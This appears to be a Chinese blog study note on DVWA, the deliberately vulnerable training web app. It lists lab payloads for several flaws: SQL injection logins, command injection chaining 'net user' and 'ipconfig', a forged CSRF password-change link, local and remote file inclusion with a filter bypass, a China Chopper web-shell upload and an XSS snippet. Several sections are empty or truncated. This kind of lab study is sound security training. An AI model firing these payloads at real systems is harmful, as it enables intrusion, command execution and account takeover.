DVWA漏洞学习

Brute Force

  • Low
  1. 利用burpsuite即可完成(复制粘贴会出现400 bad request错误)

抓包,按ctrl+i或action下的send to intruder 设置参数 设置字典 开始破解

    2.手工sql注入

1. Username:admin' or'1'='1 Password:(空)

2. Username :admin'# Password :(空)

SELECT * FROM `users` WHERE user='$user' AND password='$pass';

  • High

python脚本

Command Injection(命令行注入)

  • Low
  1. 127.0.0.1&&net user window和linux系统都可以用&&来执行多条命令
  • Medium
  1. 127.0.0.1&net user 用一个&代替&& &:第一个成功在执行第二个
  2. 127.0.0.1&;&ipconfig
  • High
  1. 127.0.0.1|net user

 

CSRF(跨站请求伪造)

  • Low
  1. http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change# 点击发送http请求就修改密码 CSRF最关键就是利用受害者的cookie向服务器发送伪造请求,如果之前用谷歌登录,后在火狐打开有害链接,不会修改密码,会跳到登录界面。
  2.  

404

file not found.

 

 

File Inclusion(文件包含)

  • Low
  1. 本地文件包含 http://192.168.140.132/dvwa/vulnerabilities/fi/?page=/1.txt 打开了服务器本地的根目录下的一个文件夹
  2. 远程文件包含http://192.168.140.132/dvwa/vulnerabilities/fi/?page=http://192.168.140.1:8081/Webhello/1.txt 打开远程服务器下的一个文件 调用里面的函数
  • Medium
  1. http://192.168.153.130/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.140.1:8081/Webhello/1.txt medium会删除"http://" 因此此路径删除后还有一个http://
  • High

File Upload(文件上传)

  1. 上传一句话木马:
  2. 使用中国菜刀发送post请求

Insecure CAPTCHA(不安全的验证码)

SQL Injection(SQL注入)

SQL Injection(Blind)(SQL盲注)

XSS(Reflected)(反射型跨站脚本)

  • Low
  • Medium
  1. ript>alert(/xss/)
  • High

通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码

 

你可能感兴趣的:(渗透测试)